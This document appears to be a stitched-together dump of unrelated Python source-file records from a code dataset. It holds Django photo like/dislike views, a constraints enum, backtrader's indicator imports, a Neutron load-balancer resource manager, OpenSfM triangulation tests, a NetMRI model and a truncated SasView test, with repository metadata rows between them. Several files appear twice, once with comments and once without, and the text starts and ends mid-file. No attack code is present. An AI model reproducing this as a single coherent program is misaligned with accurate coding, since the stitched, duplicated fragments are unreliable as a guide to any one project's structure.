    # Bug fix: instantiate HttpResponseNotAllowed with permitted methods
    # instead of returning the class object.
    return HttpResponseNotAllowed(['PATCH'])
@csrf_exempt
def dislike_photo(request, pk: int):
    """Atomically increment the dislike counter of photo ``pk`` and
    return the updated photo as JSON.

    Only PATCH is allowed; any other verb receives a 405 response.
    NOTE(review): an unknown pk raises Photo.DoesNotExist (HTTP 500);
    consider get_object_or_404 if 404 is the desired contract.
    """
    if request.method == 'PATCH':
        # transaction.atomic groups the read-modify-write; add_dislike()
        # is assumed to persist the change -- confirm in the model.
        with transaction.atomic():
            photo = Photo.objects.get(pk=pk)
            photo.add_dislike()
            return JsonResponse(photo.to_dict())
    # Bug fix: instantiate HttpResponseNotAllowed with permitted methods
    # instead of returning the class object.
    return HttpResponseNotAllowed(['PATCH'])
| 26.75 | 81 | 0.687435 | from django.db import transaction
from django.http import JsonResponse, HttpResponseNotAllowed
from django.views.decorators.csrf import csrf_exempt
from .models import Photo
def list_photos(request):
    """Return all photos, ordered by unsplash id, as a JSON array.

    Only GET is allowed; any other verb receives a 405 response.
    """
    if request.method == 'GET':
        photos = Photo.objects.all().order_by('unsplash_id')
        # List comprehension instead of map(lambda ...) for clarity.
        return JsonResponse([p.to_dict() for p in photos], safe=False)
    # Bug fix: the original returned the HttpResponseNotAllowed *class*,
    # not an instance; the constructor requires the permitted methods.
    return HttpResponseNotAllowed(['GET'])
@csrf_exempt
def like_photo(request, pk: int):
    """Atomically increment the like counter of photo ``pk`` and return
    the updated photo as JSON.

    Only PATCH is allowed; any other verb receives a 405 response.
    NOTE(review): an unknown pk raises Photo.DoesNotExist (HTTP 500);
    consider get_object_or_404 if 404 is the desired contract.
    """
    if request.method == 'PATCH':
        # transaction.atomic groups the read-modify-write; add_like() is
        # assumed to persist the change -- confirm in the model.
        with transaction.atomic():
            photo = Photo.objects.get(pk=pk)
            photo.add_like()
            return JsonResponse(photo.to_dict())
    # Bug fix: instantiate HttpResponseNotAllowed with permitted methods
    # instead of returning the class object.
    return HttpResponseNotAllowed(['PATCH'])
@csrf_exempt
def dislike_photo(request, pk: int):
    """Atomically increment the dislike counter of photo ``pk`` and
    return the updated photo as JSON.

    Only PATCH is allowed; any other verb receives a 405 response.
    NOTE(review): an unknown pk raises Photo.DoesNotExist (HTTP 500);
    consider get_object_or_404 if 404 is the desired contract.
    """
    if request.method == 'PATCH':
        # transaction.atomic groups the read-modify-write; add_dislike()
        # is assumed to persist the change -- confirm in the model.
        with transaction.atomic():
            photo = Photo.objects.get(pk=pk)
            photo.add_dislike()
            return JsonResponse(photo.to_dict())
    # Bug fix: instantiate HttpResponseNotAllowed with permitted methods
    # instead of returning the class object.
    return HttpResponseNotAllowed(['PATCH'])
| true | true |
f72eb561be479318fbf20e59f9be7488fc76b552 | 221 | py | Python | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | null | null | null | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | 20 | 2021-12-31T15:28:20.000Z | 2022-02-15T18:24:16.000Z | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | null | null | null | from enum import Enum, auto
class Constraints(Enum):
    """Enumeration of validation-constraint identifiers.

    Member values are the same auto-assigned 1-based integers as before,
    just written out explicitly; only the member identity appears
    meaningful here (semantics are enforced elsewhere).
    """
    not_empty = 1
    greater_than_0 = 2
    not_null = 3
    is_email = 4
    is_uri = 5
    after_now = 6
    before_now = 7
| 18.416667 | 27 | 0.606335 | from enum import Enum, auto
class Constraints(Enum):
    """Enumeration of validation-constraint identifiers.

    Values are auto-assigned sequential integers; only the member
    identity appears meaningful here (semantics are enforced elsewhere,
    not visible in this module).
    """
    not_empty = auto()
    greater_than_0 = auto()
    not_null = auto()
    is_email = auto()
    is_uri = auto()
    after_now = auto()
    before_now = auto()
| true | true |
f72eb585890bafe8941f0c78a9d950477be13230 | 2,555 | py | Python | backtrader/backtrader/indicators/__init__.py | harshabakku/live-back-testing-trader | 1fd69c7598dc15bea740f160eed886f396bcba2c | [
"MIT"
] | 1 | 2021-07-14T22:04:08.000Z | 2021-07-14T22:04:08.000Z | backtrader/backtrader/indicators/__init__.py | ajmal017/LiveBackTestingTrader | 8b4f5804c0aa6046128f6706582f9cde78a0519a | [
"MIT"
] | null | null | null | backtrader/backtrader/indicators/__init__.py | ajmal017/LiveBackTestingTrader | 8b4f5804c0aa6046128f6706582f9cde78a0519a | [
"MIT"
] | 3 | 2021-03-07T16:29:40.000Z | 2022-03-17T21:42:38.000Z | #!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015, 2016, 2017 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from backtrader import Indicator
from backtrader.functions import *
# The modules below should/must define __all__ with the Indicator objects
# of prepend an "_" (underscore) to private classes/variables
from .basicops import *
# base for moving averages
from .mabase import *
# moving averages (so envelope and oscillators can be auto-generated)
from .sma import *
from .ema import *
from .smma import *
from .wma import *
from .dema import *
from .kama import *
from .zlema import *
from .hma import *
from .zlind import *
from .dma import *
# depends on moving averages
from .deviation import *
# depend on basicops, moving averages and deviations
from .atr import *
from .aroon import *
from .bollinger import *
from .cci import *
from .crossover import *
from .dpo import *
from .directionalmove import *
from .envelope import *
from .heikinashi import *
from .lrsi import *
from .macd import *
from .momentum import *
from .oscillator import *
from .percentchange import *
from .percentrank import *
from .pivotpoint import *
from .prettygoodoscillator import *
from .priceoscillator import *
from .psar import *
from .rsi import *
from .stochastic import *
from .trix import *
from .tsi import *
from .ultimateoscillator import *
from .williams import *
from .rmi import *
from .awesomeoscillator import *
from .accdecoscillator import *
from .dv2 import * # depends on percentrank
# Depends on Momentum
from .kst import *
from .ichimoku import *
from .hurst import *
from .ols import *
from .hadelta import *
| 28.076923 | 79 | 0.699413 | true | true | |
f72eb6919b6ff61569dadd031bc009867b1f62b7 | 8,984 | py | Python | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2014 Juniper Networks, Inc. All rights reserved.
#
from abc import ABCMeta, abstractmethod, abstractproperty
from eventlet import greenthread
from neutron.common import exceptions as n_exc
from neutron.extensions import loadbalancer
from neutron.plugins.common import constants
from vnc_api.vnc_api import NoIdError, RefsExistError
import six
import uuid
class LoadbalancerMethodInvalid(n_exc.BadRequest):
    """Raised (HTTP 400) when a pool is configured with an unsupported
    load-balancing method; message is formatted with lb_method/pool_id.
    """
    message = _("Method %(lb_method)s not supported for pool %(pool_id)s")
@six.add_metaclass(ABCMeta)
class ResourceManager(object):
    """Abstract base for neutron load-balancer resource handlers backed
    by the Contrail VNC API.
    Concrete subclasses supply the resource-specific primitives (read,
    list, update, delete, dict translation); this base implements the
    common neutron-facing CRUD flow, tenant scoping and filtering.
    """
    # How many times _project_read() polls before giving up.
    _max_project_read_attempts = 3
    def __init__(self, api):
        # api: VNC API client used for all backend reads/writes.
        self._api = api
    # NOTE(review): the get_exception_* members are declared with
    # @abstractproperty but are invoked as callables below
    # (self.get_exception_notfound(id=...)) -- confirm subclasses expose
    # them accordingly.
    @abstractproperty
    def property_type_mapping(self):
        """ Mapping from property name to neutron dict key.
        """
        pass
    @abstractmethod
    def make_properties(self, resource):
        """ Returns the properties for the specified resource.
        """
        pass
    @abstractmethod
    def make_dict(self, resource, fields):
        """ Return the contrail api resource in the dictionary format
        expected by neutron.
        """
        pass
    @abstractmethod
    def resource_read(self, id):
        """ Read the specified resource from the api server.
        """
        pass
    @abstractmethod
    def resource_list(self, tenant_id):
        """ Returns the list of objects from the api server.
        """
        pass
    @abstractmethod
    def resource_update(self, obj):
        """ Call the update method.
        """
        pass
    @abstractmethod
    def resource_delete(self, id):
        """ Delete the specified resource from the api server.
        """
        pass
    @abstractproperty
    def get_exception_notfound(self, id):
        """ Returns the correct NotFound exception.
        """
        pass
    @abstractproperty
    def get_exception_inuse(self, id):
        """ Returns the correct InUse exception.
        """
        pass
    @abstractproperty
    def neutron_name(self):
        """ Resource name in a request from neutron.
        """
        pass
    @abstractproperty
    def resource_name_plural(self):
        """ Resource list name in a list response from api server.
        """
        pass
    @abstractmethod
    def create(self, context, resource):
        """ Create resource.
        """
        pass
    @abstractmethod
    def update_properties(self, obj, id, resource):
        """ Update the resource properties.
        Returns True when a change was applied, False otherwise.
        """
        return False
    def update_object(self, obj, id, resource):
        """ Update object metadata other than properties.
        Returns True when a change was applied, False otherwise.
        """
        return False
    def _get_tenant_id_for_create(self, context, resource):
        # Admins may create on behalf of any tenant; everyone else may
        # only use their own tenant id.
        if context.is_admin and 'tenant_id' in resource:
            tenant_id = resource['tenant_id']
        elif ('tenant_id' in resource and
              resource['tenant_id'] != context.tenant_id):
            reason = 'Cannot create resource for another tenant'
            raise n_exc.AdminRequired(reason=reason)
        else:
            tenant_id = context.tenant_id
        return tenant_id
    def _get_resource_name(self, resource, parent, name, uuid):
        """ Generate an unique name. This is display name if there are
        no conflicts or display_name + uuid.
        """
        fq_name = list(parent.fq_name)
        fq_name.append(name)
        try:
            # A successful fq_name lookup means the name is already taken.
            obj = self._api.fq_name_to_id(resource, fq_name)
        except NoIdError:
            return name
        return name + '-' + uuid
    def _is_authorized(self, context, resource):
        # Admins can touch anything; others only their own tenant's objects.
        return context.is_admin or context.tenant_id == resource['tenant_id']
    def _project_read(self, project_id):
        """ Reads the project from the api server, retrying a few times
        (the project may not be visible on the api server yet); raises
        TenantNetworksDisabled if it never shows up.
        """
        for i in range(self._max_project_read_attempts):
            try:
                return self._api.project_read(id=str(uuid.UUID(project_id)))
            except NoIdError:
                pass
            greenthread.sleep(1)
        raise n_exc.TenantNetworksDisabled()
    def _fields(self, resource, fields):
        # Project the response dict onto the requested field names, if any.
        if fields:
            return dict(((key, item) for key, item in resource.items()
                         if key in fields))
        return resource
    def _apply_filter(self, resource, filters):
        # A resource passes when, for every filter key it carries, its
        # value is among the accepted values; keys absent from the
        # resource are not filtered on.
        if filters is None:
            return True
        for key, value in filters.iteritems():
            if key in resource and not resource[key] in value:
                return False
        return True
    def _get_object_status(self, obj):
        # The id_perms enable flag drives the neutron status field.
        id_perms = obj.get_id_perms()
        if id_perms and id_perms.enable:
            return constants.ACTIVE
        return constants.PENDING_DELETE
    def _get_object_description(self, obj):
        id_perms = obj.get_id_perms()
        if id_perms is None:
            return None
        return id_perms.description
    def _get_object_tenant_id(self, obj):
        # The owning project is the first two components of the fq_name.
        proj_fq_name = obj.get_fq_name()[0:2]
        try:
            proj = self._api.project_read(fq_name=proj_fq_name)
        except NoIdError:
            return None
        return proj.uuid
    def get_resource(self, context, id, fields=None):
        """ Implement GET by uuid.
        """
        try:
            obj = self.resource_read(id=id)
        except NoIdError:
            raise self.get_exception_notfound(id=id)
        tenant_id = str(uuid.UUID(context.tenant_id))
        project_id = self._get_object_tenant_id(obj)
        if not context.is_admin and tenant_id != project_id:
            # Report NotFound rather than Forbidden so the existence of
            # other tenants' resources is not leaked.
            raise self.get_exception_notfound(id=id)
        return self.make_dict(obj, fields)
    def _get_resource_dict(self, uuid, filters, fields):
        # Read one object and translate it; None when it is gone or does
        # not match the filters.
        try:
            obj = self.resource_read(id=uuid)
        except NoIdError:
            return None
        res = self.make_dict(obj, None)
        if not self._apply_filter(res, filters):
            return None
        return self._fields(res, fields)
    def get_collection(self, context, filters=None, fields=None):
        """ Generic implementation of list command.
        """
        response = []
        if filters and 'id' in filters:
            # Fast path: explicit id list; skip the full backend listing.
            for v in filters['id']:
                res = self._get_resource_dict(v, filters, fields)
                if res is not None and self._is_authorized(context, res):
                    response.append(res)
            return response
        tenant_id = None
        if not context.is_admin:
            # Non-admins only see their own tenant's resources.
            tenant_id = context.tenant_id
        obj_list = self.resource_list(tenant_id=tenant_id)
        if self.resource_name_plural not in obj_list:
            return response
        for v in obj_list[self.resource_name_plural]:
            res = self._get_resource_dict(v['uuid'], filters, fields)
            if res is not None:
                response.append(res)
        return response
    def delete(self, context, id):
        # Non-admins must own the object before it can be deleted.
        if not context.is_admin:
            try:
                obj = self.resource_read(id=id)
            except NoIdError:
                raise self.get_exception_notfound(id=id)
            tenant_id = str(uuid.UUID(context.tenant_id))
            project_id = self._get_object_tenant_id(obj)
            if tenant_id != project_id:
                raise n_exc.NotAuthorized()
        try:
            self.resource_delete(id=id)
        except NoIdError:
            raise self.get_exception_notfound(id=id)
        except RefsExistError:
            # Still referenced by other objects; surface as "in use".
            raise self.get_exception_inuse(id=id)
    def update_properties_subr(self, props, resource):
        """ Update the DB properties object from the neutron parameters.
        Returns True when any mapped attribute actually changed.
        """
        change = False
        for key, mapping in self.property_type_mapping.iteritems():
            if mapping not in resource:
                continue
            if getattr(props, key) != resource[mapping]:
                setattr(props, key, resource[mapping])
                change = True
        return change
    def update(self, context, id, resource):
        """ Update the resource.
        """
        try:
            obj = self.resource_read(id=id)
        except NoIdError:
            raise self.get_exception_notfound(id=id)
        id_perms = obj.get_id_perms()
        if not id_perms or not id_perms.enable:
            # Disabled objects are pending delete; refuse the update.
            raise loadbalancer.StateInvalid(id=id,
                                            state=constants.PENDING_DELETE)
        r = resource[self.neutron_name]
        if r:
            update = False
            if 'description' in r and id_perms.description != r['description']:
                id_perms.description = r['description']
                obj.set_id_perms(id_perms)
                update = True
            if self.update_properties(obj, id, r):
                update = True
            if self.update_object(obj, id, r):
                update = True
            if update:
                # Persist only when something actually changed.
                self.resource_update(obj)
        return self.make_dict(obj)
| 30.662116 | 79 | 0.598508 |
from abc import ABCMeta, abstractmethod, abstractproperty
from eventlet import greenthread
from neutron.common import exceptions as n_exc
from neutron.extensions import loadbalancer
from neutron.plugins.common import constants
from vnc_api.vnc_api import NoIdError, RefsExistError
import six
import uuid
class LoadbalancerMethodInvalid(n_exc.BadRequest):
    """Raised (HTTP 400) when a pool is configured with an unsupported
    load-balancing method; message is formatted with lb_method/pool_id.
    """
    message = _("Method %(lb_method)s not supported for pool %(pool_id)s")
@six.add_metaclass(ABCMeta)
class ResourceManager(object):
_max_project_read_attempts = 3
def __init__(self, api):
self._api = api
@abstractproperty
def property_type_mapping(self):
pass
@abstractmethod
def make_properties(self, resource):
pass
@abstractmethod
def make_dict(self, resource, fields):
pass
@abstractmethod
def resource_read(self, id):
pass
@abstractmethod
def resource_list(self, tenant_id):
pass
@abstractmethod
def resource_update(self, obj):
pass
@abstractmethod
def resource_delete(self, id):
pass
@abstractproperty
def get_exception_notfound(self, id):
pass
@abstractproperty
def get_exception_inuse(self, id):
pass
@abstractproperty
def neutron_name(self):
pass
@abstractproperty
def resource_name_plural(self):
pass
@abstractmethod
def create(self, context, resource):
pass
@abstractmethod
def update_properties(self, obj, id, resource):
return False
def update_object(self, obj, id, resource):
return False
def _get_tenant_id_for_create(self, context, resource):
if context.is_admin and 'tenant_id' in resource:
tenant_id = resource['tenant_id']
elif ('tenant_id' in resource and
resource['tenant_id'] != context.tenant_id):
reason = 'Cannot create resource for another tenant'
raise n_exc.AdminRequired(reason=reason)
else:
tenant_id = context.tenant_id
return tenant_id
def _get_resource_name(self, resource, parent, name, uuid):
fq_name = list(parent.fq_name)
fq_name.append(name)
try:
obj = self._api.fq_name_to_id(resource, fq_name)
except NoIdError:
return name
return name + '-' + uuid
def _is_authorized(self, context, resource):
return context.is_admin or context.tenant_id == resource['tenant_id']
def _project_read(self, project_id):
for i in range(self._max_project_read_attempts):
try:
return self._api.project_read(id=str(uuid.UUID(project_id)))
except NoIdError:
pass
greenthread.sleep(1)
raise n_exc.TenantNetworksDisabled()
def _fields(self, resource, fields):
if fields:
return dict(((key, item) for key, item in resource.items()
if key in fields))
return resource
def _apply_filter(self, resource, filters):
if filters is None:
return True
for key, value in filters.iteritems():
if key in resource and not resource[key] in value:
return False
return True
def _get_object_status(self, obj):
id_perms = obj.get_id_perms()
if id_perms and id_perms.enable:
return constants.ACTIVE
return constants.PENDING_DELETE
def _get_object_description(self, obj):
id_perms = obj.get_id_perms()
if id_perms is None:
return None
return id_perms.description
def _get_object_tenant_id(self, obj):
proj_fq_name = obj.get_fq_name()[0:2]
try:
proj = self._api.project_read(fq_name=proj_fq_name)
except NoIdError:
return None
return proj.uuid
def get_resource(self, context, id, fields=None):
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
tenant_id = str(uuid.UUID(context.tenant_id))
project_id = self._get_object_tenant_id(obj)
if not context.is_admin and tenant_id != project_id:
raise self.get_exception_notfound(id=id)
return self.make_dict(obj, fields)
def _get_resource_dict(self, uuid, filters, fields):
try:
obj = self.resource_read(id=uuid)
except NoIdError:
return None
res = self.make_dict(obj, None)
if not self._apply_filter(res, filters):
return None
return self._fields(res, fields)
    def get_collection(self, context, filters=None, fields=None):
        """List resources visible to *context*, optionally filtered and
        projected onto *fields*.

        With an 'id' filter only those ids are read, each guarded by a
        per-resource authorization check. Otherwise the backend list is
        scoped to the caller's tenant unless the caller is an admin.
        """
        response = []
        if filters and 'id' in filters:
            # Direct-by-id path: read each requested object individually.
            for v in filters['id']:
                res = self._get_resource_dict(v, filters, fields)
                if res is not None and self._is_authorized(context, res):
                    response.append(res)
            return response
        tenant_id = None
        if not context.is_admin:
            # Non-admins only see their own tenant's objects.
            tenant_id = context.tenant_id
        obj_list = self.resource_list(tenant_id=tenant_id)
        if self.resource_name_plural not in obj_list:
            # Backend returned no collection at all -> empty result.
            return response
        for v in obj_list[self.resource_name_plural]:
            res = self._get_resource_dict(v['uuid'], filters, fields)
            if res is not None:
                response.append(res)
        return response
    def delete(self, context, id):
        """Delete resource *id*.

        Non-admins may only delete objects owned by their own tenant
        (ownership compared via the backing project's UUID). Backend
        errors are mapped: missing object -> not-found exception,
        object still referenced -> in-use exception.
        """
        if not context.is_admin:
            try:
                obj = self.resource_read(id=id)
            except NoIdError:
                raise self.get_exception_notfound(id=id)
            tenant_id = str(uuid.UUID(context.tenant_id))
            project_id = self._get_object_tenant_id(obj)
            if tenant_id != project_id:
                raise n_exc.NotAuthorized()
        try:
            self.resource_delete(id=id)
        except NoIdError:
            raise self.get_exception_notfound(id=id)
        except RefsExistError:
            raise self.get_exception_inuse(id=id)
def update_properties_subr(self, props, resource):
change = False
for key, mapping in self.property_type_mapping.iteritems():
if mapping not in resource:
continue
if getattr(props, key) != resource[mapping]:
setattr(props, key, resource[mapping])
change = True
return change
    def update(self, context, id, resource):
        """Update resource *id* from the request body *resource*.

        Refuses objects already disabled (treated as pending delete).
        Writes back to the backend only when something actually changed:
        the description, mapped properties, or object-level fields.
        Returns the (possibly updated) object as a Neutron dict.
        """
        try:
            obj = self.resource_read(id=id)
        except NoIdError:
            raise self.get_exception_notfound(id=id)
        id_perms = obj.get_id_perms()
        if not id_perms or not id_perms.enable:
            # Disabled object: no further updates are allowed.
            raise loadbalancer.StateInvalid(id=id,
                                            state=constants.PENDING_DELETE)
        r = resource[self.neutron_name]
        if r:
            update = False
            if 'description' in r and id_perms.description != r['description']:
                id_perms.description = r['description']
                obj.set_id_perms(id_perms)
                update = True
            if self.update_properties(obj, id, r):
                update = True
            if self.update_object(obj, id, r):
                update = True
            if update:
                # Only hit the backend when something really changed.
                self.resource_update(obj)
        return self.make_dict(obj)
| true | true |
f72eb75b52c1111f421c3e6bb21b6e69eee64a93 | 2,707 | py | Python | opensfm/test/test_triangulation.py | vik748/OpenSfM | bd949246e3e0d6d3a707a08224038034d27e3ee8 | [
"BSD-2-Clause"
] | null | null | null | opensfm/test/test_triangulation.py | vik748/OpenSfM | bd949246e3e0d6d3a707a08224038034d27e3ee8 | [
"BSD-2-Clause"
] | 3 | 2021-06-08T22:22:02.000Z | 2022-03-12T00:47:52.000Z | opensfm/test/test_triangulation.py | smarvar/sfm_smarvar | 569144c26df860cfa45d183f7701d0414e35d086 | [
"BSD-2-Clause"
] | null | null | null | import numpy as np
import networkx as nx
from opensfm import io
from opensfm import pygeometry
from opensfm import reconstruction
from opensfm import pysfm
def test_track_triangulator_equirectangular():
    """Test triangulating tracks of spherical images.

    Two equirectangular shots, one unit apart along X, both observe
    track '1'; the triangulated point must land in front of the cameras
    with the expected depth.
    """
    tracks_manager = pysfm.TracksManager()
    # NOTE(review): Observation args appear to be (x, y, size, r, g, b,
    # feature_id) -- confirm against pysfm.Observation.
    tracks_manager.add_observation('im1', '1', pysfm.Observation(0, 0, 1.0, 0, 0, 0, 0))
    tracks_manager.add_observation('im2', '1', pysfm.Observation(-0.1, 0, 1.0, 0, 0, 0, 1))
    rec = io.reconstruction_from_json({
        "cameras": {
            "theta": {
                "projection_type": "equirectangular",
                "width": 800,
                "height": 400,
            }
        },
        "shots": {
            'im1': {
                "camera": "theta",
                "rotation": [0.0, 0.0, 0.0],
                "translation": [0.0, 0.0, 0.0],
            },
            'im2': {
                "camera": "theta",
                "rotation": [0, 0, 0.0],
                "translation": [-1, 0, 0.0],
            },
        },
        "points": {
        },
    })
    triangulator = reconstruction.TrackTriangulator(tracks_manager, rec)
    # Arguments: track id, reprojection threshold, minimum ray angle (deg).
    triangulator.triangulate('1', 0.01, 2.0)
    assert '1' in rec.points
    p = rec.points['1'].coordinates
    assert np.allclose(p, [0, 0, 1.3763819204711])
    # Both observations must be attached to the new point.
    assert len(rec.points['1'].get_observations()) == 2
def unit_vector(x):
    """Return *x* as a numpy array scaled to unit Euclidean length."""
    v = np.array(x)
    return v / np.linalg.norm(v)
def test_triangulate_bearings_dlt():
    """DLT triangulation of two bearings from cameras one unit apart
    must recover the point (0, 0, 1)."""
    # [R|t] for two cameras: identity rotation, second shifted by -1 in x.
    rt1 = np.append(np.identity(3), [[0], [0], [0]], axis=1)
    rt2 = np.append(np.identity(3), [[-1], [0], [0]], axis=1)
    b1 = unit_vector([0.0, 0, 1])
    b2 = unit_vector([-1.0, 0, 1])
    max_reprojection = 0.01
    min_ray_angle = np.radians(2.0)
    res, X = pygeometry.triangulate_bearings_dlt(
        [rt1, rt2], [b1, b2], max_reprojection, min_ray_angle)
    assert np.allclose(X, [0, 0, 1.0])
    assert res is True
def test_triangulate_bearings_midpoint():
    """Midpoint triangulation of two bearings from origins one unit
    apart must recover the point (0, 0, 1)."""
    o1 = np.array([0.0, 0, 0])
    b1 = unit_vector([0.0, 0, 1])
    o2 = np.array([1.0, 0, 0])
    b2 = unit_vector([-1.0, 0, 1])
    max_reprojection = 0.01
    min_ray_angle = np.radians(2.0)
    # This API takes one reprojection threshold per bearing.
    res, X = pygeometry.triangulate_bearings_midpoint(
        [o1, o2], [b1, b2], 2 * [max_reprojection], min_ray_angle)
    assert np.allclose(X, [0, 0, 1.0])
    assert res is True
def test_triangulate_two_bearings_midpoint():
    """Two-bearing midpoint triangulation must recover (0, 0, 1).

    Unlike the DLT/midpoint variants above, this API takes no
    reprojection/angle thresholds, so the previously computed (and
    unused) max_reprojection / min_ray_angle locals were removed.
    """
    o1 = np.array([0.0, 0, 0])
    b1 = unit_vector([0.0, 0, 1])
    o2 = np.array([1.0, 0, 0])
    b2 = unit_vector([-1.0, 0, 1])
    X = pygeometry.triangulate_two_bearings_midpoint([o1, o2], [b1, b2])
    assert np.allclose(X, [0, 0, 1.0])
| 30.41573 | 91 | 0.569634 | import numpy as np
import networkx as nx
from opensfm import io
from opensfm import pygeometry
from opensfm import reconstruction
from opensfm import pysfm
def test_track_triangulator_equirectangular():
tracks_manager = pysfm.TracksManager()
tracks_manager.add_observation('im1', '1', pysfm.Observation(0, 0, 1.0, 0, 0, 0, 0))
tracks_manager.add_observation('im2', '1', pysfm.Observation(-0.1, 0, 1.0, 0, 0, 0, 1))
rec = io.reconstruction_from_json({
"cameras": {
"theta": {
"projection_type": "equirectangular",
"width": 800,
"height": 400,
}
},
"shots": {
'im1': {
"camera": "theta",
"rotation": [0.0, 0.0, 0.0],
"translation": [0.0, 0.0, 0.0],
},
'im2': {
"camera": "theta",
"rotation": [0, 0, 0.0],
"translation": [-1, 0, 0.0],
},
},
"points": {
},
})
triangulator = reconstruction.TrackTriangulator(tracks_manager, rec)
triangulator.triangulate('1', 0.01, 2.0)
assert '1' in rec.points
p = rec.points['1'].coordinates
assert np.allclose(p, [0, 0, 1.3763819204711])
assert len(rec.points['1'].get_observations()) == 2
def unit_vector(x):
return np.array(x) / np.linalg.norm(x)
def test_triangulate_bearings_dlt():
rt1 = np.append(np.identity(3), [[0], [0], [0]], axis=1)
rt2 = np.append(np.identity(3), [[-1], [0], [0]], axis=1)
b1 = unit_vector([0.0, 0, 1])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_dlt(
[rt1, rt2], [b1, b2], max_reprojection, min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_midpoint(
[o1, o2], [b1, b2], 2 * [max_reprojection], min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_two_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
X = pygeometry.triangulate_two_bearings_midpoint([o1, o2], [b1, b2])
assert np.allclose(X, [0, 0, 1.0])
| true | true |
f72eb7cef44043a2b1295eb4b8935af5db17e752 | 1,064 | py | Python | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 12 | 2016-02-19T12:37:54.000Z | 2022-03-04T20:11:08.000Z | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 18 | 2015-11-12T18:37:00.000Z | 2021-05-19T07:59:55.000Z | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 18 | 2016-01-07T12:04:34.000Z | 2022-03-31T11:05:41.000Z | from ..remote import RemoteModel
class DeviceViewerOpenServicesGridRemote(RemoteModel):
    """Grid row describing an open service detected on a device.

    All attributes are plain string properties exposed by the remote API:

    | ``id:`` row identifier
    | ``attribute type:`` string

    | ``DeviceID:`` identifier of the device
    | ``attribute type:`` string

    | ``DataSourceID:`` identifier of the collecting data source
    | ``attribute type:`` string

    | ``ipaddress:`` device IP address
    | ``attribute type:`` string

    | ``ListenAddr:`` address the service listens on
    | ``attribute type:`` string

    | ``PortProtocol:`` transport protocol of the port
    | ``attribute type:`` string

    | ``Port:`` port number
    | ``attribute type:`` string

    | ``ExpectedService:`` service expected on this port
    | ``attribute type:`` string

    | ``Service:`` service actually observed
    | ``attribute type:`` string

    | ``PortTimestamp:`` time the port information was collected
    | ``attribute type:`` string
    """
    properties = ("id",
                  "DeviceID",
                  "DataSourceID",
                  "ipaddress",
                  "ListenAddr",
                  "PortProtocol",
                  "Port",
                  "ExpectedService",
                  "Service",
                  "PortTimestamp",
                  )
| 20.461538 | 54 | 0.470865 | from ..remote import RemoteModel
class DeviceViewerOpenServicesGridRemote(RemoteModel):
properties = ("id",
"DeviceID",
"DataSourceID",
"ipaddress",
"ListenAddr",
"PortProtocol",
"Port",
"ExpectedService",
"Service",
"PortTimestamp",
)
| true | true |
f72eb800bacb5e3e23d6174f7e147ea13700f6c0 | 1,887 | py | Python | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | """
Unit tests for the sas_gen
"""
import os.path
import warnings
warnings.simplefilter("ignore")
import unittest
import numpy as np
from sas.sascalc.calculator import sas_gen
def find(filename):
    """Return the path of *filename* inside this module's data directory."""
    data_dir = os.path.join(os.path.dirname(__file__), 'data')
    return os.path.join(data_dir, filename)
class sas_gen_test(unittest.TestCase):
    """Smoke tests for the sas_gen file readers (.sld/.pdb/.omf) and the
